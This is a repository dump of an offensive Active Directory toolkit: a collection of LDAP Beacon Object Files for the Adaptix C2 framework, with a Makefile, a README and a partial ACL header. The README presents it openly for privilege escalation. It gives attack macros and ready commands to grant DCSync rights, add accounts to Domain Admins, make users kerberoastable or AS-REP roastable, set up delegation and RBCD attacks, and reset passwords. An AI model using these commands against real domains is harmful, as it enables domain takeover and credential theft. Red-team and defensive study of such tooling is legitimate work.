AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: AD-BOF/LDAP-BOF/Makefile
================================================
# LDAP BOF Collection Makefile
CC = x86_64-w64-mingw32-gcc
STRIP = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I _include -I src/common -Os -masm=intel -fno-stack-protector -mno-stack-arg-probe -DBOF -c

all: bof

bof: clean
	@mkdir -p _bin/LDAP && echo 'creating _bin/LDAP directory'
	@$(CC) $(CFLAGS) src/get/get-users.c -o _bin/LDAP/get-users.x64.o && $(STRIP) _bin/LDAP/get-users.x64.o && echo '[+] get-users' || echo '[!] get-users'
	@$(CC) $(CFLAGS) src/get/get-computers.c -o _bin/LDAP/get-computers.x64.o && $(STRIP) _bin/LDAP/get-computers.x64.o && echo '[+] get-computers' || echo '[!] get-computers'
	@$(CC) $(CFLAGS) src/get/get-groups.c -o _bin/LDAP/get-groups.x64.o && $(STRIP) _bin/LDAP/get-groups.x64.o && echo '[+] get-groups' || echo '[!] get-groups'
	@$(CC) $(CFLAGS) src/get/get-usergroups.c -o _bin/LDAP/get-usergroups.x64.o && $(STRIP) _bin/LDAP/get-usergroups.x64.o && echo '[+] get-usergroups' || echo '[!] get-usergroups'
	@$(CC) $(CFLAGS) src/get/get-groupmembers.c -o _bin/LDAP/get-groupmembers.x64.o && $(STRIP) _bin/LDAP/get-groupmembers.x64.o && echo '[+] get-groupmembers' || echo '[!] get-groupmembers'
	@$(CC) $(CFLAGS) src/get/get-object.c -o _bin/LDAP/get-object.x64.o && $(STRIP) _bin/LDAP/get-object.x64.o && echo '[+] get-object' || echo '[!] get-object'
	@$(CC) $(CFLAGS) src/get/get-domaininfo.c -o _bin/LDAP/get-domaininfo.x64.o && $(STRIP) _bin/LDAP/get-domaininfo.x64.o && echo '[+] get-domaininfo' || echo '[!] get-domaininfo'
	@$(CC) $(CFLAGS) src/get/get-maq.c -o _bin/LDAP/get-maq.x64.o && $(STRIP) _bin/LDAP/get-maq.x64.o && echo '[+] get-maq' || echo '[!] get-maq'
	@$(CC) $(CFLAGS) src/get/get-writable.c -o _bin/LDAP/get-writable.x64.o && $(STRIP) _bin/LDAP/get-writable.x64.o && echo '[+] get-writable' || echo '[!] get-writable'
	@$(CC) $(CFLAGS) src/get/get-delegation.c -o _bin/LDAP/get-delegation.x64.o && $(STRIP) _bin/LDAP/get-delegation.x64.o && echo '[+] get-delegation' || echo '[!] get-delegation'
	@$(CC) $(CFLAGS) src/get/get-uac.c -o _bin/LDAP/get-uac.x64.o && $(STRIP) _bin/LDAP/get-uac.x64.o && echo '[+] get-uac' || echo '[!] get-uac'
	@$(CC) $(CFLAGS) src/get/get-attribute.c -o _bin/LDAP/get-attribute.x64.o && $(STRIP) _bin/LDAP/get-attribute.x64.o && echo '[+] get-attribute' || echo '[!] get-attribute'
	@$(CC) $(CFLAGS) src/get/get-spn.c -o _bin/LDAP/get-spn.x64.o && $(STRIP) _bin/LDAP/get-spn.x64.o && echo '[+] get-spn' || echo '[!] get-spn'
	@$(CC) $(CFLAGS) src/get/get-acl.c -o _bin/LDAP/get-acl.x64.o && $(STRIP) _bin/LDAP/get-acl.x64.o && echo '[+] get-acl' || echo '[!] get-acl'
	@$(CC) $(CFLAGS) src/get/get-rbcd.c -o _bin/LDAP/get-rbcd.x64.o && $(STRIP) _bin/LDAP/get-rbcd.x64.o && echo '[+] get-rbcd' || echo '[!] get-rbcd'
	@$(CC) $(CFLAGS) src/add/add-user.c -o _bin/LDAP/add-user.x64.o && $(STRIP) _bin/LDAP/add-user.x64.o && echo '[+] add-user' || echo '[!] add-user'
	@$(CC) $(CFLAGS) src/add/add-computer.c -o _bin/LDAP/add-computer.x64.o && $(STRIP) _bin/LDAP/add-computer.x64.o && echo '[+] add-computer' || echo '[!] add-user'
	@$(CC) $(CFLAGS) src/add/add-group.c -o _bin/LDAP/add-group.x64.o && $(STRIP) _bin/LDAP/add-group.x64.o && echo '[+] add-group' || echo '[!] add-user'
	@$(CC) $(CFLAGS) src/add/add-groupmember.c -o _bin/LDAP/add-groupmember.x64.o && $(STRIP) _bin/LDAP/add-groupmember.x64.o && echo '[+] add-groupmember' || echo '[!] add-groupmember'
	@$(CC) $(CFLAGS) src/add/add-ou.c -o _bin/LDAP/add-ou.x64.o && $(STRIP) _bin/LDAP/add-ou.x64.o && echo '[+] add-ou' || echo '[!] add-ou'
	@$(CC) $(CFLAGS) src/add/add-sidhistory.c -o _bin/LDAP/add-sidhistory.x64.o && $(STRIP) _bin/LDAP/add-sidhistory.x64.o && echo '[+] add-sidhistory' || echo '[!] add-sidhistory'
	@$(CC) $(CFLAGS) src/add/add-spn.c -o _bin/LDAP/add-spn.x64.o && $(STRIP) _bin/LDAP/add-spn.x64.o && echo '[+] add-spn' || echo '[!] add-spn'
	@$(CC) $(CFLAGS) src/add/add-attribute.c -o _bin/LDAP/add-attribute.x64.o && $(STRIP) _bin/LDAP/add-attribute.x64.o && echo '[+] add-attribute' || echo '[!] add-attribute'
	@$(CC) $(CFLAGS) src/add/add-uac.c -o _bin/LDAP/add-uac.x64.o && $(STRIP) _bin/LDAP/add-uac.x64.o && echo '[+] add-uac' || echo '[!] add-uac'
	@$(CC) $(CFLAGS) src/add/add-delegation.c -o _bin/LDAP/add-delegation.x64.o && $(STRIP) _bin/LDAP/add-delegation.x64.o && echo '[+] add-delegation' || echo '[!] add-delegation'
	@$(CC) $(CFLAGS) src/add/add-rbcd.c -o _bin/LDAP/add-rbcd.x64.o && $(STRIP) _bin/LDAP/add-rbcd.x64.o && echo '[+] add-rbcd' || echo '[!] add-rbcd'
	@$(CC) $(CFLAGS) src/add/add-ace.c -o _bin/LDAP/add-ace.x64.o && $(STRIP) _bin/LDAP/add-ace.x64.o && echo '[+] add-ace' || echo '[!] add-ace'
	@$(CC) $(CFLAGS) src/set/set-password.c -o _bin/LDAP/set-password.x64.o && $(STRIP) _bin/LDAP/set-password.x64.o && echo '[+] set-password' || echo '[!] set-password'
	@$(CC) $(CFLAGS) src/set/set-spn.c -o _bin/LDAP/set-spn.x64.o && $(STRIP) _bin/LDAP/set-spn.x64.o && echo '[+] set-spn' || echo '[!] set-spn'
	@$(CC) $(CFLAGS) src/set/set-delegation.c -o _bin/LDAP/set-delegation.x64.o && $(STRIP) _bin/LDAP/set-delegation.x64.o && echo '[+] set-delegation' || echo '[!] set-delegation'
	@$(CC) $(CFLAGS) src/set/set-attribute.c -o _bin/LDAP/set-attribute.x64.o && $(STRIP) _bin/LDAP/set-attribute.x64.o && echo '[+] set-attribute' || echo '[!] set-attribute'
	@$(CC) $(CFLAGS) src/set/set-uac.c -o _bin/LDAP/set-uac.x64.o && $(STRIP) _bin/LDAP/set-uac.x64.o && echo '[+] set-uac' || echo '[!] set-uac'
	@$(CC) $(CFLAGS) src/set/set-owner.c -o _bin/LDAP/set-owner.x64.o && $(STRIP) _bin/LDAP/set-owner.x64.o && echo '[+] set-owner' || echo '[!] set-owner'
	@$(CC) $(CFLAGS) src/move/move-object.c -o _bin/LDAP/move-object.x64.o && $(STRIP) _bin/LDAP/move-object.x64.o && echo '[+] move-object' || echo '[!] move-object'
	@$(CC) $(CFLAGS) src/remove/remove-groupmember.c -o _bin/LDAP/remove-groupmember.x64.o && $(STRIP) _bin/LDAP/remove-groupmember.x64.o && echo '[+] remove-groupmember' || echo '[!] remove-groupmember'
	@$(CC) $(CFLAGS) src/remove/remove-object.c -o _bin/LDAP/remove-object.x64.o && $(STRIP) _bin/LDAP/remove-object.x64.o && echo '[+] remove-object' || echo '[!] remove-object'
	@$(CC) $(CFLAGS) src/remove/remove-delegation.c -o _bin/LDAP/remove-delegation.x64.o && $(STRIP) _bin/LDAP/remove-delegation.x64.o && echo '[+] remove-delegation' || echo '[!] remove-delegation'
	@$(CC) $(CFLAGS) src/remove/remove-spn.c -o _bin/LDAP/remove-spn.x64.o && $(STRIP) _bin/LDAP/remove-spn.x64.o && echo '[+] remove-spn' || echo '[!] remove-spn'
	@$(CC) $(CFLAGS) src/remove/remove-attribute.c -o _bin/LDAP/remove-attribute.x64.o && $(STRIP) _bin/LDAP/remove-attribute.x64.o && echo '[+] remove-attribute' || echo '[!] remove-attribute'
	@$(CC) $(CFLAGS) src/remove/remove-rbcd.c -o _bin/LDAP/remove-rbcd.x64.o && $(STRIP) _bin/LDAP/remove-rbcd.x64.o && echo '[+] remove-rbcd' || echo '[!] remove-rbcd'
	@$(CC) $(CFLAGS) src/remove/remove-ace.c -o _bin/LDAP/remove-ace.x64.o && $(STRIP) _bin/LDAP/remove-ace.x64.o && echo '[+] remove-ace' || echo '[!] remove-ace'
	@$(CC) $(CFLAGS) src/remove/remove-uac.c -o _bin/LDAP/remove-uac.x64.o && $(STRIP) _bin/LDAP/remove-uac.x64.o && echo '[+] remove-uac' || echo '[!] remove-uac'

clean:
	@rm -rf _bin/LDAP


================================================
FILE: AD-BOF/LDAP-BOF/README.md
================================================
# LDAP BOF Collection

Collection of many LDAP bofs for domain enumeration and privilege escalation. This project was created for use with the Adaptix C2, and has a mapping file which registers commands under the `ldap` prefix. To see usage for any command, run `help ldap {command}`.

## Command Reference

### View Usage

```bash
help ldap {command}
```

### Enumeration Commands (GET)

| Command            | Description                                                    | Usage Example                                                                    |
|--------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------|
| `get-users`        | List all users in the domain                                   | `ldap get-users [-ou ou_path] [-dc dc_fqdn] [-a attributes] [--ldaps]`           |
| `get-computers`    | List all computers in the domain                               | `ldap get-computers [-ou ou_path] [-dc dc_fqdn] [-a attributes] [--ldaps]`       |
| `get-groups`       | List all groups in the domain                                  | `ldap get-groups [-ou ou_path] [-dc dc_fqdn] [-a attributes] [--ldaps]`          |
| `get-usergroups`   | List all groups a user is a member of                          | `ldap get-usergroups <user> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`               |
| `get-groupmembers` | List all members of a group                                    | `ldap get-groupmembers <group> [-ou ou_path] [-dc dc_fqdn]`                      |
| `get-object`       | Get all attributes of an object                                | `ldap get-object <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                 |
| `get-maq`          | Get machine account quota (ms-DS-MachineAccountQuota)          | `ldap get-maq [-dc dc_fqdn] [--ldaps]`                                           |
| `get-domaininfo`   | Query domain information from rootDSE                          | `ldap get-domaininfo [-dc dc_fqdn] [--ldaps]`                                    |
| `get-writable`     | Find objects you have write access to                          | `ldap get-writable [-ou ou_path] [-dc dc_fqdn] [--ldaps] [--detailed]`           |
| `get-delegation`   | Get delegation configuration for an object                     | `ldap get-delegation <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`             |
| `get-uac`          | Get UAC flags for an object                                    | `ldap get-uac <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                    |
| `get-attribute`    | Get specific attribute values (comma-separated list supported) | `ldap get-attribute <target> <attributes> [-ou ou_path] [-dc dc_fqdn] [--ldaps]` |
| `get-spn`          | Get SPNs for an object                                         | `ldap get-spn <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                    |
| `get-acl`          | Get ACL/security descriptor for an object                      | `ldap get-acl <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps] [--resolve]`        |
| `get-rbcd`         | Get RBCD configuration for an object                           | `ldap get-rbcd <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                   |

### Creation Commands (ADD)

| Command           | Description                                   | Usage Example                                                                                                                                              |
|-------------------|-----------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|
| `add-user`        | Add a user to the domain                      | `ldap add-user <username> <password> [-fn firstname] [-ln lastname] [-email email] [--disabled] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                     |
| `add-computer`    | Add a computer to the domain                  | `ldap add-computer <computer> [-p password] [-ou ou_path] [-dc dc_fqdn] [--disabled] [--ldaps]`                                                            |
| `add-group`       | Add a group to the domain                     | `ldap add-group <groupname> [-desc description] [-type type] [-scope scope] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                         |
| `add-groupmember` | Add a member to a group                       | `ldap add-groupmember <group> <member> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                              |
| `add-ou`          | Add an organizational unit                    | `ldap add-ou <ou_name> [-desc description] [-parent parent_ou] [-dc dc_fqdn] [--ldaps]`                                                                    |
| `add-sidhistory`  | Add a SID to an object's sidHistory attribute | `ldap add-sidhistory <target> <sid_source> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                          |
| `add-spn`         | Add an SPN to a object                        | `ldap add-spn <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                        |
| `add-attribute`   | Add a value to an attribute                   | `ldap add-attribute <target> <attribute> <value> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                    |
| `add-uac`         | Add UAC flags to an object                    | `ldap add-uac <target> <flags> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                      |
| `add-delegation`  | Add a delegation SPN to an object             | `ldap add-delegation <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                 |
| `add-ace`         | Add an ACE to an object's DACL                | `ldap add-ace <target> <trustee> <rights> [-type ace_type] [-flags flags] [-guid guid] [-inherit-guid inherit_guid] [-ou ou_path] [-dc dc_fqdn] [--ldaps]` |
| `add-rbcd`        | Add an RBCD delegation                        | `ldap add-rbcd <target> <delegate> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                  |

### Modification Commands (SET)

| Command          | Description                                      | Usage Example                                                                           |
|------------------|--------------------------------------------------|-----------------------------------------------------------------------------------------|
| `set-password`   | Set/reset a user's password                      | `ldap set-password <target> <password> [-old old_password] [-ou ou_path] [-dc dc_fqdn]` |
| `set-spn`        | Set/replace all SPNs on an object                | `ldap set-spn <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                     |
| `set-delegation` | Set/replace delegation SPNs                      | `ldap set-delegation <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`              |
| `set-attribute`  | Set/replace an attribute value                   | `ldap set-attribute <target> <attribute> <value> [-ou ou_path] [-dc dc_fqdn] [--ldaps]` |
| `set-uac`        | Set UAC flags (replaces all)                     | `ldap set-uac <target> <flags> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                   |
| `set-owner`      | Set the owner of an object (requires WriteOwner) | `ldap set-owner <target> <owner> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                 |

### Other Commands

| Command       | Description                      | Usage Example                                                                                |
|---------------|----------------------------------|----------------------------------------------------------------------------------------------|
| `move-object` | Move an object to a different OU | `ldap move-object <object> <destination> [-n newname] [-ou ou_path] [-dc dc_fqdn] [--ldaps]` |

### Removal Commands (REMOVE)

| Command              | Description                            | Usage Example                                                                                                                            |
|----------------------|----------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------|
| `remove-groupmember` | Remove a member from a group           | `ldap remove-groupmember <group> <member> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                         |
| `remove-object`      | Remove an object from the domain       | `ldap remove-object <object> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                      |
| `remove-delegation`  | Remove a delegation SPN                | `ldap remove-delegation <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                            |
| `remove-spn`         | Remove an SPN from an object           | `ldap remove-spn <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                   |
| `remove-attribute`   | Remove an attribute or attribute value | `ldap remove-attribute <target> <attribute> [-value value] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                        |
| `remove-ace`         | Remove an ACE from an object's DACL    | `ldap remove-ace <target> [-trustee trustee] [-rights rights] [-type ace_type] [-index ace_index] [-ou ou_path] [-dc dc_fqdn] [--ldaps]` |
| `remove-rbcd`        | Remove an RBCD delegation              | `ldap remove-rbcd <target> <delegate> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                             |
| `remove-uac`         | Remove UAC flags from an object        | `ldap remove-uac <target> <flags> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                 |

### Attack Macros

These macros simplify common AD exploitation techniques by wrapping multiple operations:

| Macro                 | Description                                         | Usage Example                                                                                                                                              |
|-----------------------|-----------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|
| `add-genericall`      | Add a GenericAll ACE to an object's DACL            | `ldap add-genericall <target> <trustee> [-type ace_type] [-flags flags] [-guid guid] [-inherit-guid inherit_guid] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`   |
| `add-genericwrite`    | Add a GenericWrite ACE to an object's DACL          | `ldap add-genericwrite <target> <trustee> [-type ace_type] [-flags flags] [-guid guid] [-inherit-guid inherit_guid] [-ou ou_path] [-dc dc_fqdn] [--ldaps]` |
| `add-asreproastable`  | Make a user AS-REP roastable (set DONT_REQ_PREAUTH) | `ldap add-asreproastable <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                   |
| `add-dcsync`          | Add DCSync ACEs to an object's DACL                 | `ldap add-dcsync <target> <trustee> [-type ace_type] [-flags flags] [-guid guid] [-inherit-guid inherit_guid] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`       |
| `add-unconstrained`   | Enable unconstrained delegation on an object        | `ldap add-unconstrained <target> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                    |
| `add-constrained`     | Set/replace delegation SPNs                         | `ldap add-constrained <target> <spn> [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                                                                |
| `remove-genericall`   | Remove a GenericAll ACE from an object's DACL       | `ldap remove-genericall <target> <trustee> [-type ace_type] [-index ace_index] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                      |
| `remove-genericwrite` | Remove a GenericWrite ACE from an object's DACL     | `ldap remove-genericwrite <target> <trustee> [-type ace_type] [-index ace_index] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                    |
| `remove-dcsync`       | Remove DCSync ACEs from an object's DACL            | `ldap remove-dcsync <target> <trustee> [-type ace_type] [-index ace_index] [-ou ou_path] [-dc dc_fqdn] [--ldaps]`                                          |

## Usage Examples

### Basic Enumeration
```bash
# List all domain users
ldap get-users

# List computers in specific OU
ldap get-computers -ou "OU=Servers,DC=corp,DC=local"

# Query user's group memberships
ldap get-usergroups jane.doe

# Find objects you can modify
ldap get-writable --detailed
```

### User/Computer Creation
```bash
# Create new user
ldap add-user jane.doe Password123!

# Create computer account
ldap add-computer TESTCOMP -p Password123!

# Add user to Domain Admins
ldap add-groupmember "Domain Admins" jane.doe
```

### Password & Attribute Manipulation
```bash
# Change user password
ldap set-password targetuser Password123!

# Make user kerberoastable
ldap add-spn targetuser HTTP/fake.service

# Make user AS-REP roastable
ldap add-asreproastable targetuser
```

### Delegation Attacks
```bash
# Configure unconstrained delegation
ldap add-unconstrained WS01$

# Configure constrained delegation
ldap add-constrained WS02$ CIFS/DC01.corp.local

# Configure RBCD
ldap add-rbcd DC01$ ATTACKER$
```

### ACL/Permission Manipulation
```bash
# View object's ACL
ldap get-acl "CN=AdminUser,CN=Users,DC=corp,DC=local"

# Grant DCSync rights
ldap add-dcsync "DC=corp,DC=local" eviluser

# Grant GenericAll on user
ldap add-genericall targetuser attackeruser

# Remove specific ACE
ldap remove-ace targetuser -index 5
```

### LDAPS Usage
```bash
# Use LDAPS (port 636) for sensitive operations
ldap set-password targetuser NewP@ss789 --ldaps
ldap add-user secretuser P@ss123 --ldaps
```

### Targeting Specific DC
```bash
# Target specific domain controller
ldap get-users -dc 192.168.1.10
ldap add-groupmember "Domain Admins" attacker -dc 192.168.1.10
```


## Technical Details

### Authentication
All LDAP operations use the current beacon's security context. The toolkit automatically:
- Retrieves current user credentials
- Establishes authenticated LDAP binds
- Negotiates signing/sealing for LDAP
- Handles LDAPS certificate validation (accepts all)

Something I discovered in testing that may or may not be relevant to you: 

### DN vs Username Detection
Commands automatically detect input format:
- **Distinguished Names** - Match pattern: `CN=...,DC=...`
- **Usernames** - Simple alphanumeric strings
- Automatic search and conversion when needed

### LDAPS Certificate Handling
The toolkit includes a permissive certificate callback that accepts all server certificates, useful for environments with self-signed certificates or certificate mismatches.

### Common Permissions Required
- **User/Computer Creation** - Write access to target OU, may require specific extended rights
- **Group Modifications** - Write access to group object
- **Password Changes** - "Reset Password" or "Change Password" rights
- **ACL Modifications** - WriteDACL permission on target object
- **Delegation** - Write to `msDS-AllowedToActOnBehalfOfOtherIdentity` or `userAccountControl`

## Troubleshooting

### Connection Issues
```bash
# Test basic connectivity
ldap get-domaininfo

# Try explicit DC specification
ldap get-domaininfo -dc 192.168.1.10

# Use LDAPS if port 389 is blocked
ldap get-domaininfo --ldaps
```

### Permission Errors
- Verify current user context: `whoami`
- Check object permissions: `ldap get-acl {target}`
- Use `ldap get-writable` to find modifiable objects

### Object Not Found
```bash
# Use distinguished name instead of username
ldap get-object "CN=jane.doe,CN=Users,DC=corp,DC=local"

# Specify search OU
ldap get-users -ou "OU=Employees,DC=corp,DC=local"
```

## Credits

- [bloodyAD](https://github.com/CravateRouge/bloodyAD)
- [ldapsearch bof](https://github.com/trustedsec/CS-Situational-Awareness-BOF)


================================================
FILE: AD-BOF/LDAP-BOF/_include/acl_common.h
================================================
#ifndef ACL_COMMON_H
#define ACL_COMMON_H

#include <windows.h>
#include <aclapi.h>

// ============================================================================
// SECURITY DESCRIPTOR STRUCTURES
// ============================================================================

// Security Descriptor Control flags
/*
#define SE_OWNER_DEFAULTED              0x0001
#define SE_GROUP_DEFAULTED              0x0002
#define SE_DACL_PRESENT                 0x0004
#define SE_DACL_DEFAULTED               0x0008
#define SE_SACL_PRESENT                 0x0010
#define SE_SACL_DEFAULTED               0x0020
#define SE_DACL_AUTO_INHERIT_REQ        0x0100
#define SE_SACL_AUTO_INHERIT_REQ        0x0200
#define SE_DACL_AUTO_INHERITED          0x0400
#define SE_SACL_AUTO_INHERITED          0x0800
#define SE_DACL_PROTECTED               0x1000
#define SE_SACL_PROTECTED               0x2000
#define SE_RM_CONTROL_VALID             0x4000
#define SE_SELF_RELATIVE                0x8000
*/

// ACL Revision constants
#ifndef ACL_REVISION
#define ACL_REVISION                    0x02
#endif
#ifndef ACL_REVISION_DS
#define ACL_REVISION_DS                 0x04
#endif

/*
// ACE Types
#define ACCESS_ALLOWED_ACE_TYPE                 0x00
#define ACCESS_DENIED_ACE_TYPE                  0x01
#define SYSTEM_AUDIT_ACE_TYPE                   0x02
#define SYSTEM_ALARM_ACE_TYPE                   0x03
#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE        0x04
#define ACCESS_ALLOWED_OBJECT_ACE_TYPE          0x05
#define ACCESS_DENIED_OBJECT_ACE_TYPE           0x06
#define SYSTEM_AUDIT_OBJECT_ACE_TYPE            0x07
#define SYSTEM_ALARM_OBJECT_ACE_TYPE            0x08
#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE        0x09
#define ACCESS_DENIED_CALLBACK_ACE_TYPE         0x0A
#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE          0x0D
#define SYSTEM_ALARM_CALLBACK_ACE_TYPE          0x0E
#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE   0x0F
#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE   0x10
#define SYSTEM_MANDATORY_LABEL_ACE_TYPE         0x11
#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE      0x12
#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE        0x13
*/

/*
// ACE Flags (Inheritance and Propagation)
#define OBJECT_INHERIT_ACE                0x01
#define CONTAINER_INHERIT_ACE             0x02
#define NO_PROPAGATE_INHERIT_ACE          0x04
#define INHERIT_ONLY_ACE                  0x08
#define INHERITED_ACE                     0x10
#define SUCCESSFUL_ACCESS_ACE_FLAG        0x40
#define FAILED_ACCESS_ACE_FLAG            0x80
*/

/*
// Access Mask - Generic Rights
#define GENERIC_READ                      0x80000000
#define GENERIC_WRITE                     0x40000000
#define GENERIC_EXECUTE                   0x20000000
#define GENERIC_ALL                       0x10000000

// Access Mask - Standard Rights
#define DELETE_ACCESS                     0x00010000
#define READ_CONTROL                      0x00020000
#define WRITE_DACL                        0x00040000
#define WRITE_OWNER                       0x00080000
#define SYNCHRONIZE                       0x00100000
#define STANDARD_RIGHTS_REQUIRED          0x000F0000
#define STANDARD_RIGHTS_READ              READ_CONTROL
#define STANDARD_RIGHTS_WRITE             READ_CONTROL
#define STANDARD_RIGHTS_EXECUTE           READ_CONTROL
#define STANDARD_RIGHTS_ALL               0x001F0000

// Access Mask - Specific Rights (DS Objects)
#define ADS_RIGHT_DS_CREATE_CHILD         0x00000001
#define ADS_RIGHT_DS_DELETE_CHILD         0x00000002
#define ADS_RIGHT_ACTRL_DS_LIST           0x00000004
#define ADS_RIGHT_DS_SELF                 0x00000008
#define ADS_RIGHT_DS_READ_PROP            0x00000010
#define ADS_RIGHT_DS_WRITE_PROP           0x00000020
#define ADS_RIGHT_DS_DELETE_TREE          0x00000040
#define ADS_RIGHT_DS_LIST_OBJECT          0x00000080
#define ADS_RIGHT_DS_CONTROL_ACCESS       0x00000100

// Object ACE Flags
#define ACE_OBJECT_TYPE_PRESENT           0x00000001
#define ACE_INHERITED_OBJECT_TYPE_PRESENT 0x00000002
*/

// Access Mask - Standard Rights
#define DELETE_ACCESS                     0x00010000
#define WRITE_DACL                        0x00040000

// Access Mask - Specific Rights (DS Objects)
#define ADS_RIGHT_DS_CREATE_CHILD         0x00000001
#define ADS_RIGHT_DS_DELETE_CHILD         0x00000002
#define ADS_RIGHT_ACTRL_DS_LIST           0x00000004
#define ADS_RIGHT_DS_SELF                 0x00000008
#define ADS_RIGHT_DS_READ_PROP            0x00000010
#define ADS_RIGHT_DS_WRITE_PROP           0x00000020
#define ADS_RIGHT_DS_DELETE_TREE          0x00000040
#define ADS_RIGHT_DS_LIST_OBJECT          0x00000080
#define ADS_RIGHT_DS_CONTROL_ACCESS       0x00000100

// ============================================================================
// WELL-KNOWN SIDS AND GUIDS
// ============================================================================

// Well-known SID strings
#define SID_EVERYONE                      "S-1-1-0"
#define SID_AUTHENTICATED_USERS           "S-1-5-11"
#define SID_SYSTEM                        "S-1-5-18"
#define SID_DOMAIN_ADMINS                 "S-1-5-21-*-512"
#define SID_ENTERPRISE_ADMINS             "S-1-5-21-*-519"

// Extended Rights GUIDs (for ADS_RIGHT_DS_CONTROL_ACCESS)
// User-Force-Change-Password
#define GUID_USER_FORCE_CHANGE_PASSWORD   "00299570-246d-11d0-a768-00aa006e0529"

// DS-Replication-Get-Changes (DCSync)
#define GUID_DS_REPLICATION_GET_CHANGES       "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
#define GUID_DS_REPLICATION_GET_CHANGES_ALL   "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
#define GUID_DS_REPLICATION_GET_CHANGES_FILTERED "89e95b76-444d-4c62-991a-0facbeda640c"

// DS-Replication-Sync (for completeness)
#define GUID_DS_REPLICATION_SYNC              "1131f6ab-9c07-11d1-f79f-00c04fc2dcd2"

// Generic Read/Write Property GUIDs (all properties)
#define GUID_ALL_PROPERTIES                   "00000000-0000-0000-0000-000000000000"

// ============================================================================
// STRUCTURES
// ============================================================================

// ACE Header structure
#ifdef ACE_HEADER
typedef struct _ACE_HEADER {
    BYTE AceType;
    BYTE AceFlags;
    WORD AceSize;
} ACE_HEADER, *PACE_HEADER;
#endif

// Standard ACCESS_ALLOWED_ACE structure
#ifdef ACCESS_ALLOWED_ACE
typedef struct _ACCESS_ALLOWED_ACE {
    ACE_HEADER Header;
    ACCESS_MASK Mask;
    DWORD SidStart;  // First DWORD of SID
} ACCESS_ALLOWED_ACE, *PACCESS_ALLOWED_ACE;
#endif

// Object ACE structure (for extended rights)
#ifdef ACCESS_ALLOWED_OBJECT_ACE
typedef struct _ACCESS_ALLOWED_OBJECT_ACE {
    ACE_HEADER Header;
    ACCESS_MASK Mask;
    DWORD Flags;
    GUID ObjectType;
    GUID InheritedObjectType;
    DWORD SidStart;
} ACCESS_ALLOWED_OBJECT_ACE, *PACCESS_ALLOWED_OBJECT_ACE;
#endif

// Parsed ACE information structure (for display)
typedef struct _PARSED_ACE_INFO {
    BYTE AceType;
    BYTE AceFlags;
    ACCESS_MASK Mask;
    char* TrusteeSid;          // String SID
    char* TrusteeName;         // Resolved name (optional)
    BOOL IsObjectAce;
    GUID ObjectType;           // Valid if IsObjectAce && HasObjectType
    GUID InheritedObjectType;  // Valid if IsObjectAce && HasInheritedObjectType
    BOOL HasObjectType;
    BOOL HasInheritedObjectType;
} PARSED_ACE_INFO, *PPARSED_ACE_INFO;

// Security Descriptor information structure
typedef struct _SD_INFO {
    char* OwnerSid;
    char* OwnerName;
    char* GroupSid;
    char* GroupName;
    DWORD ControlFlags;
    BOOL HasDacl;
    BOOL HasSacl;
    DWORD DaclAceCount;
    DWORD SaclAceCount;
    PARSED_ACE_INFO* DaclAces;  // Array of parsed DACL ACEs
    PARSED_ACE_INFO* SaclAces;  // Array of parsed SACL ACEs
} SD_INFO, *PSD_INFO;

// ============================================================================
// ADVAPI32 FUNCTION IMPORTS
// ============================================================================

// Security Descriptor functions
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$InitializeSecurityDescriptor(
